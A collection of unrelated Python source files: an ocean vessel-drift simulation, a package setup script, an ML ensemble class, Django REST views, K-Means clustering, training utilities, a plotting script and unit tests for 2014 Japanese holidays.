outfile = vessel_type + '_' + base_fname
# release points from each ais location where a vessel was in the past
lons, lats = lonlat_from_tif(run_config.start_date, tif_file)
# launch vessel simulation
vessel_sim = AlaskaDrift(loglevel=run_config.loglevel)
vessel_sim.add_reader(run_config.readers)
for i in range(run_config.number):
vessel_sim.seed_elements(
lon=lons,
lat=lats,
time=run_config.start_date,
number=len(lons),
radius=run_config.radius
)
# Disabling the automatic GSHHG landmask
vessel_sim.set_config('general:use_auto_landmask', False)
# Backup velocities
vessel_sim.set_config('environment:fallback:sea_ice_area_fraction', 0)
vessel_sim.set_config('environment:fallback:northward_sea_ice_velocity', 0)
vessel_sim.set_config('environment:fallback:eastward_sea_ice_velocity', 0)
vessel_sim.set_config('environment:fallback:northward_sea_water_velocity', 0)
vessel_sim.set_config('environment:fallback:eastward_sea_water_velocity', 0)
vessel_sim.set_config('environment:fallback:x_wind', 0)
vessel_sim.set_config('environment:fallback:y_wind', 0)
vessel_sim.run(
time_step=run_config.time_step,
time_step_output=run_config.time_step_output,
duration=run_config.duration,
outfile=outfile
)
def run_simulations(
days=7,
number=50,
radius=5000,
timestep=900,
output_timestep=3600,
tif_dir=TIF_DIR,
loglevel=logging.INFO
):
# start date possible to launch drifter, limited by availability of HYCOM data
start_date = datetime.datetime(2019, 1, 8)
# last date possible to launch drifter, limited by availability of NAM data (2019-12-17)
last_date = datetime.datetime(2019, 12, 10)
date = start_date
duration = datetime.timedelta(days=days)
# currents + ice
hycom_file = '/mnt/store/data/assets/nps-vessel-spills/forcing-files/hycom/final-files/hycom.nc'
# Provide a name mapping to work with package methods:
name_map = {
'eastward_sea_water_velocity': 'x_sea_water_velocity',
'northward_sea_water_velocity': 'y_sea_water_velocity',
'siu': 'x_sea_ice_velocity',
'siv': 'y_sea_ice_velocity',
}
hycom_reader = reader_netCDF_CF_generic.Reader(hycom_file, standard_name_mapping=name_map)
# winds
fname = '/mnt/store/data/assets/nps-vessel-spills/forcing-files/nam/regrid/nam.nc'
nam_reader = reader_netCDF_CF_generic.Reader(fname)
# land - cannot use default landmask as it is -180, 180
# Instead, we use the same landmask with lons shifted to 0, 360
fname = '/mnt/store/data/assets/nps-vessel-spills/sim-scripts/drift/world_0_360.shp'
reader_landmask = reader_shape.Reader.from_shpfiles(fname)
# Reader order matters. first reader sets the projection for the simulation.
readers = [hycom_reader, nam_reader, reader_landmask]
sim_start_time = time.perf_counter()
while date <= last_date:
try:
logging.info(f'simulation started for {date:%Y-%m-%d}')
start_time = time.perf_counter()
output_fname = f'alaska_drift_{date:%Y-%m-%d}.nc'
config = SimulationConfig(
date,
readers,
number,
radius,
timestep,
output_timestep,
duration,
output_fname,
loglevel
)
run_sims_for_date(config, tif_dir)
end_time = time.perf_counter()
total_time = int(end_time - start_time)
logging.info(f'simulation complete {total_time} s')
except Exception as e:
logging.warning(f'simulation failed for {date:%Y-%m-%d}')
logging.warning(str(e))
date = date + datetime.timedelta(days=days)
sim_end_time = time.perf_counter()
total_sim_time = int(sim_end_time - sim_start_time)
logging.info(f'total sim time {total_sim_time} s')
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
'-n',
'--number',
default=50,
type=int,
help='Number of vessels to launch per simulation'
)
parser.add_argument(
'-r',
'--radius',
default=25000,
type=float,
help='Max distance from release point to launch vessel (in meters)'
)
parser.add_argument(
'-a',
'--ais',
default=TIF_DIR,
type=str,
help='Path to dir with AIS tifs for release points'
)
args = parser.parse_args()
run_simulations(
days=7,
number=args.number,
radius=args.radius,
timestep=900,
output_timestep=86400,
tif_dir=args.ais,
loglevel=logging.INFO
)
if __name__ == '__main__':
main()
| 11,651 | 3,967 |
from setuptools import setup
import io
# read the contents of your README file
from os import path
this_directory = path.abspath(path.dirname(__file__))
with io.open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name = 'pyxstruct',
packages = ['pyxstruct'],
version = '1.0.3',
description = 'Scrape Geometric X-ray Data from the Cambridge Structural Database ',
long_description=long_description,
long_description_content_type='text/markdown',
author = 'Paton Research Group',
author_email = 'robert.paton@colostate.edu',
url = 'https://github.com/bobbypaton/pyX-Struct',
download_url = 'https://github.com/bobbypaton/pyX-Struct/archive/v1.0.3.zip',
keywords = ['x-ray structure', 'CCDC', 'SMILES', 'python'],
classifiers = [],
install_requires=["numpy","seaborn","pandas","matplotlib"],
python_requires='>=2.6',
include_package_data=True,
)
| 932 | 322 |
# -*- coding:utf-8 -*-
__author__ = 'yangjian'
"""
"""
import copy
import pickle
from sklearn.model_selection import StratifiedKFold
from hypernets.utils import fs
class BaseEnsemble:
import numpy as np
def __init__(self, task, estimators, need_fit=False, n_folds=5, method='soft', random_state=9527):
self.task = task
self.estimators = list(estimators)
self.need_fit = need_fit
self.method = method
self.n_folds = n_folds
self.random_state = random_state
self.classes_ = None
for est in estimators:
if est is not None and self.classes_ is None and hasattr(est, 'classes_'):
self.classes_ = est.classes_
break
def _estimator_predict(self, estimator, X):
if self.task == 'regression':
pred = estimator.predict(X)
else:
# if self.classes_ is None and hasattr(estimator, 'classes_'):
# self.classes_ = estimator.classes_
assert self.classes_ is not None
pred = estimator.predict_proba(X)
if self.method == 'hard':
pred = self.proba2predict(pred)
return pred
def _cross_validator(self):
return StratifiedKFold(n_splits=self.n_folds, shuffle=True, random_state=self.random_state)
def proba2predict(self, proba, proba_threshold=0.5):
assert len(proba.shape) <= 2
if self.task == 'regression':
return proba
if len(proba.shape) == 2:
if proba.shape[-1] > 2:
predict = proba.argmax(axis=-1)
else:
predict = (proba[:, -1] > proba_threshold).astype('int32')
else:
predict = (proba > proba_threshold).astype('int32')
return predict
def fit(self, X, y, est_predictions=None):
assert y is not None
if est_predictions is not None:
self._validate_predictions(X, y, est_predictions)
else:
assert X is not None
if self.need_fit:
est_predictions = self._Xy2predicttions(X, y)
else:
est_predictions = self._X2predictions(X)
self.fit_predictions(est_predictions, y)
def _validate_predictions(self, X, y, est_predictions):
# print(f'est_predictions.shape:{est_predictions.shape}, estimators:{len(self.estimators)}')
if self.task == 'regression' or self.method == 'hard':
assert est_predictions.shape == (len(y), len(self.estimators)), \
f'shape is not equal, may be a wrong task type. task:{self.task}, ' \
f'est_predictions.shape: {est_predictions.shape}, ' \
f'(len(y), len(self.estimators)):{(len(y), len(self.estimators))}'
else:
assert len(est_predictions.shape) == 3
assert est_predictions.shape[0] == len(y)
assert est_predictions.shape[1] == len(self.estimators)
def _Xy2predicttions(self, X, y):
if self.task == 'regression' or self.method == 'hard':
np = self.np
est_predictions = np.zeros((len(y), len(self.estimators)), dtype=np.float64)
else:
est_predictions = None
iterators = self._cross_validator()
for fold, (train, test) in enumerate(iterators.split(X, y)):
for n, estimator in enumerate(self.estimators):
X_train = X.iloc[train]
y_train = y.iloc[train]
X_test = X.iloc[test]
estimator.fit(X_train, y_train)
if self.classes_ is None and hasattr(estimator, 'classes_'):
self.classes_ = estimator.classes_
pred = self._estimator_predict(estimator, X_test)
if est_predictions is None:
np = self.np
est_predictions = np.zeros((len(y), len(self.estimators), pred.shape[1]), dtype=np.float64)
est_predictions[test, n] = pred
return est_predictions
    def _X2predictions(self, X):
        """Collect predictions of all fitted estimators for X.

        Returns shape (n_samples, n_estimators) for regression or hard
        voting, else (n_samples, n_estimators, n_classes). ``None`` slots in
        ``self.estimators`` are skipped and stay zero.
        """
        np = self.np
        if self.task == 'regression' or self.method == 'hard':
            est_predictions = np.zeros((len(X), len(self.estimators)), dtype=np.float64)
        else:
            est_predictions = np.zeros((len(X), len(self.estimators), len(self.classes_)), dtype=np.float64)
        for n, estimator in enumerate(self.estimators):
            if estimator is not None:
                pred = self._estimator_predict(estimator, X)
                # Flatten a single-column regression output to 1-D.
                if self.task == 'regression' and len(pred.shape) > 1:
                    assert pred.shape[1] == 1
                    pred = pred.reshape(pred.shape[0])
                est_predictions[:, n] = pred
        return est_predictions
def predict(self, X):
est_predictions = self._X2predictions(X)
pred = self.predictions2predict(est_predictions)
if self.task != 'regression' and self.classes_ is not None:
np = self.np
pred = np.take(np.array(self.classes_), pred, axis=0)
return pred
def predict_proba(self, X):
est_predictions = self._X2predictions(X)
return self.predictions2predict_proba(est_predictions)
    def fit_predictions(self, predictions, y_true):
        """Fit the aggregation stage on estimator predictions. Abstract."""
        raise NotImplementedError()
    def predictions2predict_proba(self, predictions):
        """Aggregate estimator predictions into class probabilities. Abstract."""
        raise NotImplementedError()
    def predictions2predict(self, predictions):
        """Aggregate estimator predictions into final predictions. Abstract."""
        raise NotImplementedError()
    def save(self, model_path):
        """Persist the ensemble under *model_path* (treated as a directory).

        Each estimator ``i`` is pickled to ``i.pkl`` (plus ``i.model`` when
        the estimator offers its own save/load pair); the ensemble shell is
        written to ``ensemble.pkl`` with estimator slots replaced by ``None``
        placeholders so the heavy models are not pickled twice.
        """
        if not model_path.endswith(fs.sep):
            model_path = model_path + fs.sep
        if not fs.exists(model_path):
            fs.mkdirs(model_path, exist_ok=True)
        # Shallow copy: the saved shell shares config but drops the estimators.
        stub = copy.copy(self)
        estimators = self.estimators
        if estimators is not None:
            stub.estimators = [None for _ in estimators]  # keep size
        if estimators is not None:
            for i, est in enumerate(estimators):
                est_pkl = f'{model_path}{i}.pkl'
                est_model = f'{model_path}{i}.model'
                # Remove stale files left by a previous save.
                for t in [est_pkl, est_model]:
                    if fs.exists(t):
                        fs.rm(t)
                if est is None:
                    continue
                with fs.open(est_pkl, 'wb') as f:
                    pickle.dump(est, f, protocol=pickle.HIGHEST_PROTOCOL)
                if hasattr(est, 'save') and hasattr(est, 'load'):
                    est.save(est_model)
        with fs.open(f'{model_path}ensemble.pkl', 'wb') as f:
            pickle.dump(stub, f, protocol=pickle.HIGHEST_PROTOCOL)
    @staticmethod
    def load(model_path):
        """Restore an ensemble written by ``save``.

        Loads the pickled shell from ``ensemble.pkl``, then re-populates its
        estimator slots from the per-estimator files, preferring an
        estimator's own ``load`` when a ``.model`` file exists.
        """
        if not model_path.endswith(fs.sep):
            model_path = model_path + fs.sep
        with fs.open(f'{model_path}ensemble.pkl', 'rb') as f:
            stub = pickle.load(f)
        if stub.estimators is not None:
            for i in range(len(stub.estimators)):
                if fs.exists(f'{model_path}{i}.pkl'):
                    with fs.open(f'{model_path}{i}.pkl', 'rb') as f:
                        est = pickle.load(f)
                    if fs.exists(f'{model_path}{i}.model') and hasattr(est, 'load'):
                        est = est.load(f'{model_path}{i}.model')
                    stub.estimators[i] = est
        return stub
| 7,317 | 2,291 |
from .product import Product
from .departament import Departament
from .city import City
from .orderDetail import OrderDetail
from .order import Order
from .user import User | 173 | 41 |
from django.db.models.query import Prefetch
from rest_framework.generics import ListAPIView, ListCreateAPIView
from apis.betterself.v1.supplements.filters import IngredientCompositionFilter, SupplementFilter, \
UserSupplementStackFilter, UserSupplementStackCompositionFilter
from apis.betterself.v1.supplements.serializers import IngredientCompositionReadOnlySerializer, \
SupplementCreateUpdateSerializer, MeasurementReadOnlySerializer, IngredientSerializer, VendorSerializer, \
SupplementReadSerializer, IngredientCompositionCreateSerializer, UserSupplementStackReadSerializer, \
UserSupplementStackCreateUpdateSerializer, UserSupplementStackCompositionCreateUpdateSerializer, \
UserSupplementStackCompositionReadSerializer
from apis.betterself.v1.utils.views import ReadOrWriteSerializerChooser, UUIDDeleteMixin, UUIDUpdateMixin
from supplements.models import Ingredient, IngredientComposition, Measurement, Supplement, UserSupplementStack, \
UserSupplementStackComposition
from vendors.models import Vendor
"""
These inherited models such as BaseGenericListCreateAPIViewV1 contain a override to get_queryset
so that users won't have access to models that are not the default or don't belong to them!
"""
class VendorView(ListCreateAPIView):
    """List the requesting user's vendors, or create a new one."""
    serializer_class = VendorSerializer
    model = Vendor
    filter_fields = ('name', 'uuid')
    def get_queryset(self):
        # Scope results to the authenticated user's own records.
        return self.model.objects.filter(user=self.request.user)
class MeasurementView(ListAPIView):
    """Read-only list of the default measurement units."""
    # Users are not allowed to create measurements, only can choose
    # whatever is on the default
    serializer_class = MeasurementReadOnlySerializer
    model = Measurement
    filter_fields = ('name', 'uuid')
    queryset = Measurement.objects.all()
class IngredientView(ListCreateAPIView):
    """List or create ingredients belonging to the requesting user."""
    serializer_class = IngredientSerializer
    model = Ingredient
    filter_fields = ('name', 'half_life_minutes', 'uuid')
    def get_queryset(self):
        # Scope results to the authenticated user's own records.
        return self.model.objects.filter(user=self.request.user)
class IngredientCompositionView(ListCreateAPIView, ReadOrWriteSerializerChooser):
    """List or create the user's ingredient compositions.

    Uses a read serializer for GET and a create serializer for POST,
    chosen by ReadOrWriteSerializerChooser.
    """
    read_serializer_class = IngredientCompositionReadOnlySerializer
    write_serializer_class = IngredientCompositionCreateSerializer
    model = IngredientComposition
    filter_class = IngredientCompositionFilter
    def get_serializer_class(self):
        # Delegate read-vs-write serializer selection to the mixin.
        return self._get_read_or_write_serializer_class()
    def get_queryset(self):
        return self.model.objects.filter(user=self.request.user)
class SupplementsListView(ListCreateAPIView, ReadOrWriteSerializerChooser, UUIDDeleteMixin, UUIDUpdateMixin):
    """List/create/update/delete the user's supplements (UUID-addressed)."""
    read_serializer_class = SupplementReadSerializer
    write_serializer_class = SupplementCreateUpdateSerializer
    update_serializer_class = SupplementCreateUpdateSerializer
    model = Supplement
    filter_class = SupplementFilter
    def get_serializer_class(self):
        return self._get_read_or_write_serializer_class()
    def get_queryset(self):
        # prefetch any compositions that exist to speed this up
        ingredient_compositions_queryset = IngredientComposition.objects.filter(user=self.request.user)
        return self.model.objects.filter(user=self.request.user).prefetch_related(Prefetch('ingredient_compositions',
                                                                                           ingredient_compositions_queryset))
class UserSupplementStackViewSet(ListCreateAPIView, ReadOrWriteSerializerChooser, UUIDDeleteMixin, UUIDUpdateMixin):
    """List/create/update/delete the user's supplement stacks."""
    model = UserSupplementStack
    write_serializer_class = UserSupplementStackCreateUpdateSerializer
    read_serializer_class = UserSupplementStackReadSerializer
    update_serializer_class = UserSupplementStackCreateUpdateSerializer
    filter_class = UserSupplementStackFilter
    def get_serializer_class(self):
        return self._get_read_or_write_serializer_class()
    def get_queryset(self):
        # Prefetch compositions to avoid per-stack queries during serialization.
        return self.model.objects.filter(user=self.request.user).prefetch_related('compositions')
class UserSupplementStackCompositionViewSet(
    ListCreateAPIView, ReadOrWriteSerializerChooser, UUIDDeleteMixin, UUIDUpdateMixin
):
    """List/create/update/delete compositions within the user's stacks."""
    model = UserSupplementStackComposition
    write_serializer_class = UserSupplementStackCompositionCreateUpdateSerializer
    read_serializer_class = UserSupplementStackCompositionReadSerializer
    update_serializer_class = UserSupplementStackCompositionCreateUpdateSerializer
    filter_class = UserSupplementStackCompositionFilter
    def get_serializer_class(self):
        return self._get_read_or_write_serializer_class()
    def get_queryset(self):
        # select_related avoids an extra query per row for the supplement FK.
        return self.model.objects.filter(user=self.request.user).select_related('supplement')
| 4,698 | 1,282 |
# flake8: noqa - this is until we take care of the F401 violations with respect to __all__ & sphinx
from .mlrun_interface import MLRunInterface
from .model_handler import ModelHandler
from .types import ExtraDataType, IOSampleType, ModelType, PathType
| 253 | 75 |
import numpy as np
from scipy.spatial import distance
import random
def mu_generator(X, K):
    """Return K distinct rows of X, chosen uniformly at random, as an array
    of initial cluster centers.

    random.sample draws K unique indices in a single call, replacing the
    original rejection-sampling while-loop (which degraded badly when K
    approached len(X)).
    """
    chosen = random.sample(range(len(X)), K)
    return np.array([X[i] for i in chosen])
def K_Means(X, K, mu):
    """Run Lloyd's K-Means until the cluster centers stop changing.

    X  : iterable of samples (rows).
    K  : number of clusters.
    mu : initial centers; when empty, K distinct rows of X are drawn at random.
    Returns the converged centers as a numpy array.

    The original implementation recursed once per update step, which could
    hit the interpreter recursion limit on slowly-converging data; this
    version iterates, with identical per-step behavior.
    """
    if len(mu) == 0:
        # No initial centers supplied: draw K distinct samples at random.
        mu = mu_generator(X, K)
    while True:
        # Assignment step: attach every sample to its nearest center.
        clusters = {cluster: [] for cluster in range(K)}
        for row in X:
            least_dist = float("inf")
            cluster_idx = None
            for idx in range(len(mu)):
                euclid_dist = distance.euclidean(row, mu[idx])
                # '<=' preserves the original tie-breaking: among equally
                # near centers the LAST one wins.
                if euclid_dist <= least_dist:
                    least_dist = euclid_dist
                    cluster_idx = idx
            clusters[cluster_idx].append(row)
        # Update step: move each non-empty cluster's center to its mean;
        # empty clusters keep their previous center.
        updated_mu = mu.copy()
        for cluster in range(K):
            if len(clusters[cluster]) == 0:
                continue
            for dim in range(len(X[0])):
                avg = sum(i[dim] for i in clusters[cluster]) / len(clusters[cluster])
                updated_mu[cluster][dim] = avg
        if np.all(mu == updated_mu):
            # Converged: no center moved during this iteration.
            return updated_mu
        mu = updated_mu
def K_Means_better(X, K):
    """Run K-Means from many random initialisations and return the converged
    set of centers that occurred most often (majority vote).

    len(X)//2 random initialisations are tried; ties on the vote count are
    broken by comparing the center tuples themselves.
    """
    candidate_inits = [mu_generator(X, K) for _ in range(int(len(X) / 2))]
    votes = {}
    for init in candidate_inits:
        converged = K_Means(X, K, init)
        # Tuples of tuples are hashable, so they can serve as dict keys.
        key = tuple(map(tuple, converged))
        votes[key] = votes.get(key, 0) + 1
    winner = max((count, centers) for centers, count in votes.items())
    return np.array(winner[1])
| 3,456 | 981 |
import asyncio
import os
from _version import __version__
def _print_version():
    """Print the program's version banner."""
    print('tele2-profit v{} by archie'.format(__version__))
def run_main(main):
    """Print the version banner and run the *main* coroutine to completion.

    KeyboardInterrupt is swallowed so Ctrl+C exits quietly. After the
    coroutine finishes, ``pause`` is invoked via os.system.
    """
    try:
        _print_version()
        event_loop = asyncio.get_event_loop()
        future = asyncio.ensure_future(main())
        event_loop.run_until_complete(future)
        # hasattr is the idiomatic membership test (was: 'system' in dir(os)).
        # NOTE(review): os.system exists on every platform, so 'pause' is
        # also attempted on POSIX where it is not a command — presumably
        # this was meant to be Windows-only; confirm the intent.
        if hasattr(os, 'system'):
            os.system('pause')
    except KeyboardInterrupt:
        pass
| 435 | 145 |
'''
Author: Liu Xin
Date: 2021-11-13 19:11:06
LastEditors: Liu Xin
LastEditTime: 2021-11-25 15:44:12
Description: 静态工具库
FilePath: /CVMI_Sementic_Segmentation/utils/static_common_utils.py
'''
import os
import random
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import warnings
from socket import gethostname
def set_random_seeds():
    """Seed every RNG the project uses (torch CPU/CUDA, numpy, random) with a
    fixed value and switch cuDNN to deterministic mode, for reproducibility.
    """
    seed = 6000
    torch.manual_seed(seed)  # CPU RNG (the original seeded it twice)
    torch.cuda.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)  # if you are using multi-GPU.
    np.random.seed(seed)  # Numpy module.
    random.seed(seed)  # Python random module.
    # Trade autotuner speed for reproducible cuDNN convolution algorithms.
    torch.backends.cudnn.benchmark = False
    torch.backends.cudnn.deterministic = True
def is_method_overridden(method, base_class, derived_class):
    """Return whether *method* of *base_class* is overridden in
    *derived_class* (which may be a class or an instance). Adapted from mmcv.

    Args:
        method (str): the method name to check.
        base_class (type): the class of the base class.
        derived_class (type | Any): the class or instance of the derived class.
    """
    assert isinstance(base_class, type), \
        "base_class doesn't accept instance, Please pass class instead."
    cls = derived_class if isinstance(derived_class, type) else derived_class.__class__
    return getattr(cls, method) != getattr(base_class, method)
def getuser():
    """Get the username from the environment or password database.

    First try various environment variables, then the password
    database. This works on Windows as long as USERNAME is set.
    """
    env_vars = ('LOGNAME', 'USER', 'LNAME', 'USERNAME')
    for user in map(os.environ.get, env_vars):
        if user:
            return user
    # If this fails, the exception will "explain" why
    import pwd
    return pwd.getpwuid(os.getuid())[0]
def get_host_info():
    """Return "user@hostname", or '' when either cannot be determined.

    Host or user lookup can fail (e.g. ``getpass.getuser()`` inside a docker
    container), so any Exception is reduced to a warning and the empty
    string is returned.
    """
    host = ''
    try:
        host = f'{getuser()}@{gethostname()}'
    except Exception as e:
        warnings.warn(f'Host or user not found: {str(e)}')
    # The original used `finally: return host`, which also swallowed
    # non-Exception errors such as KeyboardInterrupt; returning after the
    # try block keeps the intended fallback without that trap.
    return host
def mkdir_or_exist(dir_name, mode=0o777):
    """Create *dir_name* (including parents) if missing; '' is a no-op."""
    if dir_name == '':
        return
    expanded = os.path.expanduser(dir_name)
    os.makedirs(expanded, mode=mode, exist_ok=True)
def symlink(src, dst, overwrite=True, **kwargs):
    """Create a symlink *dst* pointing at *src*, replacing an existing
    entry at *dst* when *overwrite* is true."""
    if overwrite and os.path.lexists(dst):
        os.remove(dst)
    os.symlink(src, dst, **kwargs)
def build_work_dir_suffix(global_cfg, data_cfg):
    """Build a dot-separated "key_value" suffix summarising the run config
    (batch size, GPUs, optimizer, LR, LR schedule, dataset)."""
    parts = [
        f"bz_{global_cfg.batch_size}",
        f"gpus_{global_cfg.gpus}",
        f"optimizer_name_{global_cfg.optimizer.name}",
        f"lr_{global_cfg.optimizer.lr}",
        f"lr_sche_{global_cfg.lr_config.policy}",
        f"dataset_{data_cfg.name}",
    ]
    return ".".join(parts)
| 3,060 | 1,082 |
import csv
def get_receivers():
    """Return the list of receivers (first column of each row of
    ``receivers.csv`` in the current directory).

    Opens the file with ``newline=''`` as the csv module documentation
    requires, and skips empty rows (the original raised IndexError on a
    trailing blank line).
    """
    with open("receivers.csv", newline="") as fin:
        reader = csv.reader(fin)
        return [row[0] for row in reader if row]
| 230 | 71 |
import re
from util.Episode import Episode
from bs4 import BeautifulSoup
from extractors.jwplayer_extractor import JWPlayerExtractor
from scrapers.base_scraper import BaseScraper
from util.Color import printer
class GoGoAnimeScraper(BaseScraper):
    """Scrapes GoGoAnime: resolves per-episode pages and extracts m3u8
    stream URLs at the requested resolution."""
    def __init__(self, url, start_episode, end_episode, session, gui=None, resolution="480"):
        """Set up the JWPlayer extractor and resolve the site-internal anime id."""
        super().__init__(url, start_episode, end_episode, session, gui)
        self.resolution = resolution
        self.extractor = JWPlayerExtractor(None, self.session)
        # Site-internal id read from the hidden "movie_id" input; stays None
        # when the category page cannot be fetched or parsed.
        self.anime_id = None
        # Fallback list of AJAX endpoints serving the episode list.
        self.api_link_bases = ['https://ajax.gogocdn.net/ajax/load-list-episode',
                               'https://ajax.apimovie.xyz/ajax/load-list-episode']
        self.__set_anime_id()
    def __set_anime_id(self):
        """Fetch the category page and read the hidden "movie_id" input value."""
        response = self.session.get(self.url)
        if response.status_code == 200:
            soup_html = BeautifulSoup(response.content, "html.parser")
            movie_id_tag = soup_html.find("input", attrs={"id": "movie_id"})
            if movie_id_tag is not None:
                self.anime_id = movie_id_tag["value"]
    def __get_episode_data(self):
        """Return raw episode-list markup from the first responding API base,
        or None when every base fails."""
        for base_link in self.api_link_bases:
            api_link = base_link + "?ep_start=" + str(self.start_episode) + "&ep_end=" + str(
                self.end_episode) + "&id=" + self.anime_id
            response = self.session.get(api_link)
            if response.status_code == 200:
                return response.content
        return None
    def __get_page_url(self, href):
        """Build an absolute episode-page URL from a relative *href*,
        using everything before "/category/" in self.url as the base."""
        base_url = re.search("(.*)/category/", self.url).group(1)
        # print(base_url)
        src = base_url + href
        # print(src)
        return src
    def __set_stream_url(self, episode):
        """Resolve episode.download_url to an m3u8 variant at self.resolution.

        Follows the chain: episode page -> embedded player URL (data-video)
        -> JWPlayer sources -> m3u8 master -> resolution-specific link.
        Returns True on success, False when any stage fails.
        """
        response = self.session.get(episode.page_url)
        if response.status_code == 200:
            soup_html = BeautifulSoup(response.content, "html.parser")
            item_tag = soup_html.find("li", attrs={"class": "anime"}).find("a")
            streamer_url = item_tag["data-video"]
            # data-video may be protocol-relative; force https.
            if "https" not in streamer_url:
                streamer_url = "https:" + streamer_url
            streamer_resp = self.session.get(streamer_url)
            if streamer_resp.status_code == 200:
                sources = self.extractor.extract_sources(streamer_resp.text)
                src = ""
                # Pick the first HLS (m3u8) source.
                for source in sources:
                    if "m3u8" in source:
                        src = source
                        break
                if src != "":
                    res_link_id = self.extractor.get_resolution_link(src, self.resolution)
                    # Variant playlists are relative to the master's directory.
                    stream_base = re.search("(.*)/[\S]+\.m3u8", src).group(1)
                    episode.download_url = stream_base + "/" + res_link_id
                    print("stream url:", episode.download_url)
                    return True
        return False
    def __collect_episodes(self):
        """Build Episode objects (with resolved stream URLs) for the
        requested episode range. Episodes that fail to resolve are skipped."""
        printer("INFO", "Extracting page URLs...", self.gui)
        episodes = []
        if self.anime_id is not None:
            data = self.__get_episode_data()
            if data is not None:
                soup_html = BeautifulSoup(data, "html.parser")
                anchor_tags = soup_html.findAll("a", href=True)
                for anchor in anchor_tags:
                    href = anchor["href"].strip()
                    # Episode number is the trailing "-N" of the href.
                    epi_no = int(href.split("-")[-1])
                    if epi_no < self.start_episode or epi_no > self.end_episode:
                        continue
                    episode = Episode("Episode - " + str(epi_no), "Episode - " + str(epi_no))
                    episode.is_direct = False
                    episode.page_url = self.__get_page_url(href)
                    val = self.__set_stream_url(episode)
                    if val:
                        episodes.append(episode)
                    else:
                        printer("ERROR", "Failed to collect download link for " + episode.title, self.gui)
        return episodes
    def get_direct_links(self):
        """Public entry point: return the resolved episode list, or None
        when nothing could be collected or an error occurred."""
        try:
            episodes = self.__collect_episodes()
            if len(episodes) > 0:
                return episodes
            else:
                return None
        except Exception as ex:
            printer("ERROR", str(ex), self.gui)
            return None
| 4,309 | 1,294 |
'''
Constants necessary for the correct execution of this bot.
Here, most of the environment-variable values are extracted.
'''
from os import getenv
from pathlib import Path
# Base settings
# Directory containing this settings module.
PROJECT_PATH = Path(__file__).resolve().parent
# Assets (images etc.) bundled alongside the code.
UI_RESOURCES_PATH = PROJECT_PATH / 'ui_resources'
# Discord bot token; getenv returns None when the variable is unset.
BOT_TOKEN = getenv('mrdtoken')
# Extensions (cogs) loaded by the bot at startup.
EXTENSIONS_LIST = [
    'mr_dale.admin'
]
# Configuring the logging mechanism
LOG_FORMAT = {
    'format': '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'
}
# dictConfig-style logging configuration: INFO+ of the bot's own logger to
# stdout, ERROR+ (including discord.py's) to stderr.
LOGGING_SETTINGS = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {'default': LOG_FORMAT},
    'handlers': {
        'info_console_handler': {
            'class': 'logging.StreamHandler',
            'level': 'INFO',
            'formatter': 'default',
            'stream': 'ext://sys.stdout'
        },
        'error_console_handler': {
            'class': 'logging.StreamHandler',
            'level': 'ERROR',
            'stream': 'ext://sys.stderr'
        }
    },
    'loggers': {
        'mr_dale': {
            'level': 'INFO',
            'handlers': ['info_console_handler', 'error_console_handler'],
            'propagate': False
        },
        'discord': {
            'level': 'ERROR',
            'handlers': ['error_console_handler'],
            'propagate': False
        }
    }
}
| 1,355 | 433 |
# needs a parameter to specify which training record to display
import matplotlib as mpl
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import matplotlib.pyplot as plt
import functions as fn
import sys
#from matplotlib.backends.backend_pdf import PdfPages
tdata, ttarget, tlabel = fn.get_training_data()
# Index of the training record to display, taken from the command line.
i = int(sys.argv[1])
# Collect the non-zero rows of the selected record. Building a Python list
# first avoids the O(n^2) np.append-in-a-loop of the original version.
points = [tdata[i][j] for j in range(300) if not (tdata[i][j] == 0).all()]
tempdata = np.array(points) if points else np.empty((0, 3))
t_data = tempdata.transpose((1, 0))
mpl.rcParams['legend.fontsize'] = 10
fig = plt.figure()
# Figure.gca(projection=...) was deprecated in Matplotlib 3.4 and later
# removed; add_subplot(projection='3d') is the long-supported equivalent.
ax = fig.add_subplot(projection='3d')
ax.set_xlabel('x')
ax.set_ylabel('t')
ax.set_zlabel('y')
ax.view_init(0, 90)
ax.set_title(i)
x = t_data[0]
y = t_data[1]
t = t_data[2]
x_target = np.linspace(ttarget[i][0], ttarget[i][0], 1000)
y_target = np.linspace(np.mean(t_data[1]), np.mean(t_data[1]), 1000)
#y_target = np.linspace(ttarget[i][1], ttarget[i][1], 1000)
t_target = np.linspace(np.min(t_data[2]), np.max(t_data[2]), 1000)
label = ['fake', 'real']
plt_label = label[int(tlabel[i][0])]
ax.plot(x, t, y, label=plt_label)
ax.plot(x_target, t_target, y_target, label="target: "+str(ttarget[i][0])+", "+str(ttarget[i][1]))
ax.legend()
plt.show()
# coding: utf-8
import datetime
import unittest
import jpholiday
class TestYear2014(unittest.TestCase):
    """Checks jpholiday's knowledge of the 2014 Japanese public holidays."""
    def test_holiday(self):
        """Each 2014 holiday date resolves to its expected name."""
        expected = [
            (datetime.date(2014, 1, 1), '元日'),
            (datetime.date(2014, 1, 13), '成人の日'),
            (datetime.date(2014, 2, 11), '建国記念の日'),
            (datetime.date(2014, 3, 21), '春分の日'),
            (datetime.date(2014, 4, 29), '昭和の日'),
            (datetime.date(2014, 5, 3), '憲法記念日'),
            (datetime.date(2014, 5, 4), 'みどりの日'),
            (datetime.date(2014, 5, 5), 'こどもの日'),
            (datetime.date(2014, 5, 6), 'みどりの日 振替休日'),
            (datetime.date(2014, 7, 21), '海の日'),
            (datetime.date(2014, 9, 15), '敬老の日'),
            (datetime.date(2014, 9, 23), '秋分の日'),
            (datetime.date(2014, 10, 13), '体育の日'),
            (datetime.date(2014, 11, 3), '文化の日'),
            (datetime.date(2014, 11, 23), '勤労感謝の日'),
            (datetime.date(2014, 11, 24), '勤労感謝の日 振替休日'),
            (datetime.date(2014, 12, 23), '天皇誕生日'),
        ]
        for day, name in expected:
            self.assertEqual(jpholiday.is_holiday_name(day), name)
    def test_count_month(self):
        """Per-month holiday counts for 2014 (January through December)."""
        counts = [2, 1, 1, 1, 4, 0, 1, 0, 2, 1, 3, 1]
        for month, expected in enumerate(counts, start=1):
            self.assertEqual(len(jpholiday.month_holidays(2014, month)), expected)
    def test_count_year(self):
        """Total number of holidays in 2014."""
        self.assertEqual(len(jpholiday.year_holidays(2014)), 17)
